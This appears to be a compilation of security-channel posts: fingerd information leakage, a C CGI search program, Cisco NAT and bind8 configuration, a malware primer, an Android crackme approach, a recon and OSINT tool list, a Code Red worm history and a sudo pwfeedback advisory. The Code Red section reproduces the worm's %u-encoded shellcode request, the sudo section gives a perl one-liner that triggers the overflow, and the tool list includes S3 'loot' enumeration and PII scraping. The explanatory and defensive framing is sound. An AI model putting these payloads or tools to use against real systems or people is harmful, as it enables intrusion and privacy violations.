🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Unix administrative security:
t.me/UnderCodeTesting

PART 2:

> Easy to go wrong

finger is a very common tool on UNIX platforms. Its purpose is to give users relevant information about the accounts on a given system. The most problematic component on a Unix host is fingerd, the finger daemon. Its working principle is described in many UNIX books, but its drawback is that it reveals far too much information. Someone skilled at using finger can break into a machine running fingerd in a short time. This is not alarmist: finger on SUN Solaris can return every user currently logged in as well as every user account on the host, together with their details. For example, if I send a finger request to a SUN machine and query the status of root, and its fingerd has not been disabled or replaced, it will tell me the following:
Login name: root                        In real life: Super-User
Directory: /                            Shell: /sbin/sh
Last login Fri Mar 26 16:54 on pts/2
New mail received Sat Mar 27 23:10:37

🦑 So I can get the following information:

(1) The real name of root is Super-User (some system administrators write their own names here, and even set the root password to their own name!!);

(2) root's home directory is /. Sometimes, after breaking into a machine as a normal user, an attacker finds that /etc/passwd is readable and writable only by root, but can still obtain most of the user names on the host by listing the user home directories;

(3) root's login shell is /sbin/sh; if it were /bin/passwd, that would show the account can only change its password when logging in to the host;

(4) root last logged in to the machine on 2019.3.26 at 16:54;

(5) new mail for root arrived on 2019.3.26, but he has not read his mail since 2018.12.23.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques: a self-compiled C-language CGI program to implement site search

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) Environment
/usr/local/apache/htdocs/ (the files to be searched live under this directory)
/usr/local/apache/temp/ (used as a transit folder for the generated result pages)
/usr/local/apache/cgi-bin/

2) Compile search.c with gcc and place the resulting a.out in /usr/local/apache/cgi-bin/, with permissions that allow nobody to execute it.

3) chown -R nobody.nobody /usr/local/apache/temp

4) Add a file named deletetemp in /etc/cron.daily with permission 555, containing:
rm -f /usr/local/apache/temp/*

5) Add a file named myetc in /etc/cron.hourly with permission 555, containing:
updatedb -U /usr/local/apache/htdocs

6) Delete the file locate.cron in /etc/cron.daily.

Appendix (two files in total):

a) index.htm source
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>

<body>
<p>...</p>
<form name="form1" action="http://129.158.217.223/cgi-bin/a.out">
<p> </p>
<p>
<input name="keyname" value="" type=text>
</p>
<p>
<input type="submit" value="...">
</p>
</form>
<p> </p>
</body>
</html>

b) search.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
    int fd;
    int status;
    time_t i;
    size_t n;
    char cFileName[64];
    char cTempName[64];
    char cBuffer[1024];
    char cContent[10240];

    char *data;
    char keyword[256];

    (void)argc;
    (void)argv;

    data = getenv("QUERY_STRING");
    if (data == NULL)
    {
        /* CGI header, a blank line, then the body */
        printf("Content-Type: text/html\r\n\r\n");
        printf("not found!");
        exit(1);
    }

    /* Copy the keyname value up to the next '&'; the width bounds the copy */
    if (sscanf(data, "keyname=%255[^&]", keyword) != 1)
    {
        printf("Content-Type: text/html\r\n\r\n");
        printf("not found!");
        exit(1);
    }

    /* The keyword is placed on a shell command line below, so refuse anything
       that is not a plain ASCII letter, digit, '.', '-' or '_' (this rejects
       quotes, ';', '|', '$' and percent-encoded characters alike). */
    for (n = 0; keyword[n] != '\0'; n++)
    {
        if (!isalnum((unsigned char)keyword[n]) && keyword[n] != '.'
            && keyword[n] != '-' && keyword[n] != '_')
        {
            printf("Content-Type: text/html\r\n\r\n");
            printf("invalid keyword!");
            exit(1);
        }
    }

    /* Name the result page after the current time and put it in the transit folder */
    i = time(NULL);
    snprintf(cTempName, sizeof(cTempName), "%ld.html", (long)i);
    snprintf(cFileName, sizeof(cFileName), "/usr/local/apache/temp/%ld.html", (long)i);

    /* locate the keyword, rewrite the htdocs prefix into a URL, wrap each hit
       in a link, and redirect the output into the result page */
    snprintf(cBuffer, sizeof(cBuffer),
             "locate '%s' | sed -e 's#^/usr/local/apache/htdocs#http://129.158.217.223#'"
             " | sed -e 's#^.*$#<a href=&>&</a>#' > %s",
             keyword, cFileName);

    system(cBuffer);
    fd = open(cFileName, O_RDWR);
    if (fd >= 0)
    {
        status = read(fd, cContent, sizeof(cContent) - 1);
        close(fd);
        (void)status;
    }

    /* Send the browser to the generated result page */
    printf("Content-Type: text/html\r\n\r\n");
    printf("<meta http-equiv=\"refresh\" content=\"0;url=http://129.158.217.223/temp/%s\">\n",
           cTempName);
    printf("Waiting.......................\n");
    printf("%s", keyword);
    return 0;
}
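As an added example (not part of the original post or its code), here is the same request handling done without handing user input to a shell: the keyname parameter is taken from QUERY_STRING, percent-decoded, checked against a whitelist, and locate is invoked with an argument vector, while each hit is rewritten into the link the post's sed pipeline produced. The host 129.158.217.223 and the htdocs path are the post's; the function names and the regex are this example's own choices.

```python
import re
import subprocess
from urllib.parse import parse_qs

HTDOCS = "/usr/local/apache/htdocs"   # search root from the post
BASE_URL = "http://129.158.217.223"   # host used in the post's sed rewrite

# Only these characters may appear in a keyword; anything else is refused
# instead of reaching a command line (constructed policy for this example).
KEYWORD_RE = re.compile(r"^[A-Za-z0-9._ -]{1,64}$")


def parse_keyname(query_string):
    """Return the validated keyname value from a CGI QUERY_STRING, or None."""
    values = parse_qs(query_string, keep_blank_values=True).get("keyname")
    if not values:
        return None
    keyword = values[0]                 # parse_qs already percent-decodes
    if not KEYWORD_RE.match(keyword):
        return None                     # e.g. 'a;ls' is rejected, not executed
    return keyword


def build_locate_argv(keyword):
    """Argument vector for locate: no shell is involved, so quoting cannot change the command."""
    return ["locate", "--", keyword]


def path_to_link(path):
    """Rewrite one locate hit into the <a href> line the post's sed pipeline produced."""
    if not path.startswith(HTDOCS + "/"):
        return None                     # hit outside htdocs: not published
    url = BASE_URL + path[len(HTDOCS):]
    return "<a href=%s>%s</a>" % (url, url)


def render_results(paths):
    """HTML lines for a list of locate hits, dropping anything outside htdocs."""
    return [link for link in (path_to_link(p) for p in paths) if link]


def run_search(keyword):
    """Run locate with an already validated keyword (needs a locate database on the host)."""
    proc = subprocess.run(build_locate_argv(keyword), capture_output=True, text=True)
    return render_results(proc.stdout.splitlines())
```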

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
instagram.com/UndercOdeTestingCompany

PART 1

> The rapid development of network technology has given enterprise LANs more and more ways to access the INTERNET and share resources. For the most part,

> a DDN leased line, with its stable performance and good scalability, has become the commonly used method.

> A DDN connection is simple in terms of hardware: it only needs a router and a proxy server. However, for many network administrators the system configuration is the harder problem. Taking a CISCO router as an example, the author introduces several configuration methods that have worked, for colleagues' reference:
First, configuration for accessing Internet resources directly through the router

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

A) 1) The general idea and the equipment connection method
In general, internal LANs use the address ranges reserved for private use on the INTERNET:
10.0.0.0/8: 10.0.0.0 ~ 10.255.255.255
172.16.0.0/12: 172.16.0.0 ~ 172.31.255.255
192.168.0.0/16: 192.168.0.0 ~ 192.168.255.255
Under normal circumstances, when the workstations in the organization use the router directly for external access, their traffic is filtered out because the workstations use reserved addresses, so Internet resources cannot be reached. The solution is to use the NAT (Network Address Translation) function provided by the router's operating system to translate the private intranet addresses into legal Internet addresses, so that users without legal IP addresses can reach the external Internet through NAT. This has the advantages of not requiring a proxy server, reducing investment, saving legal IP addresses, and improving the security of the internal network.

2) There are two NAT modes: single mode and global mode.
In single mode, as the name suggests, many LAN hosts are mapped to one Internet address. To the outside Internet, all hosts in the LAN appear as a single Internet user, while hosts inside the LAN continue to use local addresses.
In global mode, the router interface maps a large number of LAN hosts to a certain range of Internet addresses (an IP address pool). When a local host connects to a host on the Internet, an address from the pool is automatically assigned to it; after the connection ends, the dynamically assigned address is released and can be used by other local hosts.

3) The following uses the network environment of my organization as an example to list the configuration method and process for your reference.

4) Our unit uses a Unicom optical cable (V.35) to access the Internet. The router is a CISCO 2610 and the LAN uses an INTEL 550 100M switch. Unicom provided us with the following four IP addresses:
211.90.137.25 (255.255.255.252) for our router's WAN port
211.90.137.26 (255.255.255.252) used by the other party's (China Unicom's) port
211.90.139.41 (255.255.255.252) for our own use
211.90.139.42 (255.255.255.252) for our own use

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
fb.com/UndercOdeTestingCompany

PART 2

B) 1) Configuration of the router

config t
ip nat pool c2610 211.90.139.41 211.90.139.42 netmask 255.255.255.252
(Define an address pool named c2610 containing the two free legal IP addresses used for NAT translation)
interface E0/0
ip address 192.168.0.3 255.255.255.0
ip nat inside
exit

> (Set the IP address of the Ethernet port and mark it as the port connected to the internal network)
interface S0/0
ip address 211.90.137.25 255.255.255.252
ip nat outside
exit
(Set the IP address of the WAN port and mark it as the port connected to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(Set the default route)
access-list 2 permit 192.168.0.1 0.0.0.255
(Establish an access control list)
! Dynamic NAT
!

2) ip nat inside source list 2 pool c2610 overload
(Establish dynamic address translation)
line console 0
exec-timeout 0 0
!
line vty 0 4
end
wr
(Save the settings)
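As an added illustration (not from the original post), the Python below models what the configuration above does: it classifies an address against the three reserved ranges listed in Part 1, evaluates the `access-list 2 permit 192.168.0.1 0.0.0.255` wildcard match the way IOS does (the host bits of .1 are ignored, so all of 192.168.0.0/24 is permitted), and shows how `overload` lets the two pool addresses 211.90.139.41 and .42 carry many inside hosts by varying the source port. The class and function names are this example's own; the address values are the post's.

```python
import ipaddress

# Reserved ranges from Part 1 and the NAT pool c2610 from the post
RESERVED = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
POOL = ["211.90.139.41", "211.90.139.42"]


def is_reserved(addr):
    """True if addr is a private address that the ISP would drop if sent untranslated."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RESERVED)


def wildcard_match(addr, acl_addr, wildcard):
    """IOS wildcard-mask test: a wildcard bit of 1 means 'do not care' for that bit."""
    a = int(ipaddress.ip_address(addr))
    b = int(ipaddress.ip_address(acl_addr))
    w = int(ipaddress.ip_address(wildcard))
    return (a & ~w) == (b & ~w)


def acl2_permits(addr):
    """access-list 2 permit 192.168.0.1 0.0.0.255, exactly as written in the post."""
    return wildcard_match(addr, "192.168.0.1", "0.0.0.255")


class OverloadNat:
    """Toy model of 'ip nat inside source list 2 pool c2610 overload' (PAT).

    Each inside (ip, port) pair is translated to a pool address plus a unique
    outside port, so far more hosts than pool addresses can be online at once.
    """

    def __init__(self, pool, first_port=1024):
        self.pool = pool
        self.next_port = first_port
        self.table = {}                 # (inside_ip, port) -> (outside_ip, port)

    def translate(self, inside_ip, inside_port):
        if not acl2_permits(inside_ip):
            return None                 # not matched by list 2: no translation
        key = (inside_ip, inside_port)
        if key not in self.table:
            # Round-robin over the pool; the outside port keeps each mapping unique.
            outside_ip = self.pool[len(self.table) % len(self.pool)]
            self.table[key] = (outside_ip, self.next_port)
            self.next_port += 1
        return self.table[key]
```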

3) Workstation configuration
Each workstation needs a static IP address, set in its TCP/IP properties, with the default gateway set to 192.168.0.3 (the IP address of the router's Ethernet port) and the DNS set to the address provided; the Internet browser and other tools need no special settings.
Second, configuration for accessing INTERNET resources through a proxy server

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to stop and remove viruses and other malware
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) What is a computer virus?

A computer virus is a small software program that can spread from one computer to another and interfere with the operation of the computer. Computer viruses can damage or delete data on your computer, use an email program to spread viruses to other computers, or even delete everything on your hard drive.

2) Computer viruses usually spread through attachments in e-mail messages or instant messaging messages. Therefore, never open an e-mail attachment unless you know the identity of the sender or this is exactly the e-mail attachment you are looking for. Viruses can disguise themselves as funny pictures, greeting cards, or attachments in audio and video files. Computer viruses are also spread through Internet downloads. They can be hidden in pirated software or other files or programs you download.


3) Computer virus symptoms

For information about computer virus symptoms, go to the
Microsoft Computer Security website.
> detailed ...


4)What is a worm?

A worm is a type of computer code that can spread without user interaction. Most worms start as email attachments that infect the computer once opened. The worm scans the infected computer for files that contain email addresses, such as address books or temporary web pages, then uses these addresses to send infected emails, often mimicking (or spoofing) the "From" address so the infected messages appear to come from someone the recipient knows. The worm then spreads automatically via email, networks or operating system vulnerabilities, often overwhelming systems before anyone knows why. Worms don't always damage computers, but they often cause performance and stability issues on computers and networks.

5) What is a Trojan horse?

A Trojan horse is a malicious program hidden inside another program. When it enters your computer, it hides inside a legitimate program such as a screen saver. It then places code into the operating system that gives an attacker access to the affected computer. Trojan horses usually do not spread on their own; they are spread by viruses, worms or downloaded software.

6) What is spyware?

Spyware can be installed on your computer without your knowledge. These programs can change your computer configuration or collect advertising data and personal information. Spyware can track Internet search habits, or it can redirect your web browser to other websites that you didn't plan to visit.


7) What is rogue security software?

Rogue security software programs try to make you think your computer is infected with a virus and usually prompt you to download or buy a product to remove the virus. The names of these products often include words such as antivirus, protection, security or repair, which makes them sound legitimate. They usually run immediately after you download them or the next time you start your computer. Rogue security software can prevent applications such as Internet Explorer from opening, and may also report legitimate, important Windows files as infections. Typical error messages or pop-up messages may include the following phrases:

Warning!
Computer is infected!
This computer is infected with spyware and adware.

🦑 What is malware?

Malware is software designed to damage computer systems or perform unwanted actions. Here are some examples of malware:
virus
worm
Trojan horse
Spyware
Rogue security software

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 To change your Internet Explorer proxy settings yourself, follow these steps:
twitter.com/UNdercOdetc

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) Click "Start", then click "Run".

2) In the "Run" box, copy and paste the following:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

3) Click "OK".

4) Click "Start", then click "Run".

5) In the "Run" box, copy and paste the following:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /f

6) Click "OK".

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DOMAIN NAME SERVICES:
DNS Configuration Reference
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

> As we all know, the DNS software used on the Internet was bind4, and bind8 is its successor. Compared with bind4, bind8 is better: administrators can control its behavior much more fully. But the differences between the two are still very large; not only has the configuration format changed, there are also many new concepts. The statements available in bind8 are logging, options, zone, acl, key, trusted-keys, server, controls and include. Comments in the configuration can be written in C, C++ or shell/perl style. Here I would like to introduce the basic configuration of primary and secondary domain name servers with bind8 (the two kinds of domain name servers mainly used on the Internet); if interested, you can refer to the man pages and to RFC 882, RFC 883, RFC 973, RFC 974, RFC 1033, RFC 1034, RFC 1035, RFC 1123, RFC 2308 and the "Name Server Operations Guide for BIND" for a deeper understanding.

🦑 Necessary conditions for the master DNS server to work properly:

1) Install the bind8 software, which is included in many unix distributions; otherwise get it from http://freesoft.online.sh.cn or ftp://studio.sinet.net.cn .

2) Several configuration files are required:
named.conf
named.ca
named.local
master file (that is, the zone file in bind4)

Among these configuration files, the most important is named.conf. It lives under /etc and is the file read by default when named is started. A typical named.conf includes at least options and zones. For example:

options {
        directory "/var/named";
};

zone "0.0.127.in-addr.arpa" in {
        type master;
        file "named.local";
};

zone "." in {
        type hint;
        file "named.ca";
};

zone "99.cn.net" in {
        type master;
        file "db.99.cn.net";
};

3) In it, options defines the directory where the master files are stored. Each zone corresponds to a domain, and named looks for that zone's data file in this directory: if a request for www.example.net arrives, named goes to /var/named, finds the file db.example.net and looks up the IP of www.example.net there. zone defines a domain, such as example.net; type defines what kind of domain name server this is for the zone, and master states that it is a primary server. The first zone defined makes the server the master for its own loopback reverse domain, mapping the address 127.0.0.1 back to localhost; this zone can be seen on almost all types of domain name servers.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁


1) We Start Using Pinterest
pinterest.com/UndercOdeOfficial


2) After 3 bans at github.com we decided to get another pro github account:
github.com/UndercOdeOfficial


🦑 Some follows from you will be appreciated 😊
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Hacking: simple algorithm analysis
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

New to Android dynamic debugging, and decided to use

1) First of all (the app has no anti-debugging, so it will not pretend to be cut off): run the apk, enter the verification code, and a message pops up


2) Then use JEB to analyze the apk file, find the string "Sorry, Fish!", locate the verification process, and find the verification function EatRice.

3) In libxy.so, find the function as follows. Dynamic debugging shows that the program first checks whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length is 7; if these conditions are not met it waits 3s and then returns 0. From this, the verification code format should be "X#-----", where "-" represents a character that is still unknown. Let us call this string szA.

4) The debugger shows that the program calculates on szA[1:2], szA[2:3], szA[3:4], szA[4:5] and szA[5:6] in turn and compares each result with the corresponding expected value; if all results are correct, verification succeeds.

5) The specific algorithm is not described here; look at the program yourself. Let's talk about the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to reverse directly (in my opinion). However, the algorithm works on two bytes at a time and each byte is a printable character (0x21 ~ 0x7e), so the idea is to brute-force byte by byte. In this example, when computing szA[1:2], szA[1] = '#' is known, so szA[2] can be brute-forced; szA[2] is then known when computing szA[2:3], so szA[3] can be brute-forced, and so on until every byte is recovered.
The time complexity is O(1): at most (0x7e-0x21) * 5 = 0x1d1 operations are needed to compute the answer.

🦑 Other parts will be sent later
Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOPIC: HACKER SCRIPTS - KALI - TERMUX at GITHUB
Twitter.com/UndercOdeTC

🦑 Active Intelligence Gathering

1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness

2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump

3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone

4) spoofcheck is a program that checks if a domain can be spoofed from. It checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck

5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap

6) dnsrecon is a DNS enumeration script. https://github.com/darkoperator/dnsrecon

7) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch

8) Sn1per is an automated pentest recon scanner. https://github.com/1N3/Sn1per

9) Social Mapper is an OSINT social media mapping tool: it takes a list of names & images (or a LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. It is not restricted by APIs, as it instruments a browser using Selenium, and outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper

10) skiptracer is an OSINT scraping framework; it uses basic python web scraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer

11) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents it scans. https://github.com/ElevenPaths/FOCA

12) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/banners, and employee names from different public sources. https://github.com/laramies/theHarvester

13) Metagoofil is a tool for extracting metadata from public documents (pdf, doc, xls, ppt, etc.) available on the target websites. https://github.com/laramies/metagoofil

E N J O Y
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Dangerous Virus: Code Red (computer worm)
> server attack
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.

2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.

🦑 Exploited vulnerability

3) The worm exploited a vulnerability in the indexing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.

4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.

🦑 Worm payload:

5) The payload of the worm included:

> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy

6) Other activities based on day of the month:

> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.

> Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]

> Days 28-end of month: Sleeps, no active attacks.

7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.
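As an added detection example (not from the original post), the Python below flags Code Red probes in Apache access-log lines using the request shape quoted above: a GET for /default.ida, a long run of N (the later Code Red II variant used X instead), followed by the %u-encoded payload. The log lines are constructed samples, and the regexes and function names are this example's own.

```python
import re

# Request shape from the post: /default.ida? + run of N (X for Code Red II) + %uXXXX words
CODE_RED_RE = re.compile(
    r'"GET /default\.ida\?(?P<filler>N{2,}|X{2,})(?P<payload>(?:%u[0-9a-fA-F]{4})+)[^" ]*'
)
# Apache common/combined log prefix: client, identity, user, [time], "request", status
APACHE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?P<request>"[^"]*") (?P<status>\d{3})'
)

# Constructed sample log: one Code Red probe, one normal request, one Code Red II
# probe, and a /default.ida request without the filler (should not match).
SAMPLE_LOG = """\
10.9.8.7 - - [19/Jul/2001:10:12:01 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
10.9.8.8 - - [19/Jul/2001:10:12:05 +0000] "GET /index.html HTTP/1.0" 200 1024
10.9.8.9 - - [04/Aug/2001:02:00:00 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
10.9.8.10 - - [19/Jul/2001:10:13:00 +0000] "GET /default.ida HTTP/1.0" 404 271
"""


def detect_code_red(log_text):
    """Return (client, variant, payload_words) for every matching request line.

    Only the request field is inspected, so a long query string elsewhere in the
    line (referer, user agent) cannot trigger a false positive.
    """
    hits = []
    for line in log_text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue                        # not an Apache access-log line
        cr = CODE_RED_RE.search(m.group("request"))
        if not cr:
            continue
        variant = "Code Red" if cr.group("filler").startswith("N") else "Code Red II"
        words = re.findall(r"%u([0-9a-fA-F]{4})", cr.group("payload"))
        hits.append((m.group("client"), variant, words))
    return hits
```

A 404 from Apache, as in the samples, means the probe failed; the value of the detection is the list of scanning sources, not the status code.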

powered by wiki
Posted On UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's remote office (especially in Europe) during the holiday season

1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request for help from an Internet company.
> A remote business tool and a spreadsheet file shared by one of the company's internal work groups were found to be infected with a virus, and the computers of more than 200 employees in the department were infected. The company was concerned that the security of its business systems was threatened.

🦑 Troubleshooting the source of the virus infection:

1) The company's early internal investigation: the company's network administrator noticed that the exe file of the remote office tool inside a compressed package shared by an employee through the internal working group was infected, while the remote office tool exe provided by the company itself was a normal file. The source of the virus transmission was therefore basically confirmed.

2) A Tencent Security engineer conducted a remote investigation and found that the computer suspected of being infected showed the following phenomena:

a) Unzipping the file on this computer showed that the uncompressed exe file was larger than the original and had been infected.

b) Copying any exe file to the desktop caused that exe file to be infected. After infection, the file description was changed to that of a touchpad device driver. Based on this, it could be basically confirmed that the virus is the "Synaptics" worm already disclosed by peers.

c) Continued inspection revealed no “supply chain pollution” issue with the cracked version of the compression software on this poisoned computer. It can basically be confirmed that this personal computer had been infected with the XRed virus some time earlier; during this emergency it was used as a work computer for remote office use, and when files were shared externally the company's IT staff noticed the abnormality through monitoring.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Third, block virus transmission and repair programs:
(specifically the X-Red virus)
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.

2) After confirming that Tencent Computer Manager's Cloud Master Defense can intercept the pathogen "Synaptics.exe", it was immediately requested that computers without the "Tencent T-sec Terminal Security Management System" install Tencent Computer Manager.

3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was in January 2020.

4) It is still active, and companies are advised to upgrade their anti-virus software in time to take precautions.

5) For infected computers, use Tencent Computer Manager (or the Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is rather special (for details, see the "Detailed Analysis of Samples" section below). Tencent Computer Manager can accurately identify and repair it, restoring infected files to their original state.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Everyone should take care of the X-RED MALWARE; its activity started in JAN 2020
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Vulnerability from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root

Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts, vulnerability events


> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.

> This vulnerability can only be exploited in a special configuration.

> It can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option makes sudo show visual feedback (asterisks) while the user types a password.

> Experts point out that this vulnerability can be triggered even if the user is not listed in the sudoers file.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback," sudo developer Todd C. Miller wrote.

2) "When the password is being entered, it can be reproduced by passing input to sudo through a pipe. For example:"

$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:

3) The pwfeedback option is not ignored, as it should be, when reading from something other than a terminal device. Because there is no terminal, the saved version of the line erase character remains at its initial value of 0.
If a write error occurs, the code that erases the line of asterisks does not reset the buffer position correctly, but it does reset the remaining buffer length. This causes the getln() function to write outside the buffer.

4) If this option is enabled, change "Defaults pwfeedback" to "Defaults !pwfeedback" in the sudoers file.

5) The sudo maintainer released version 1.8.31 to fix it.

"Although the logic error is present in sudo versions 1.8.26 to 1.8.30, it is not exploitable due to a change in EOF handling introduced in 1.8.26," Miller explained.

6) In October 2019, Vennix discovered a Sudo bypass issue: even if the sudoers user configuration does not allow root access, a malicious user or malicious program could still execute arbitrary commands as root on the target Linux system. This bug is patched in Undercode OS today and in Debian yesterday.
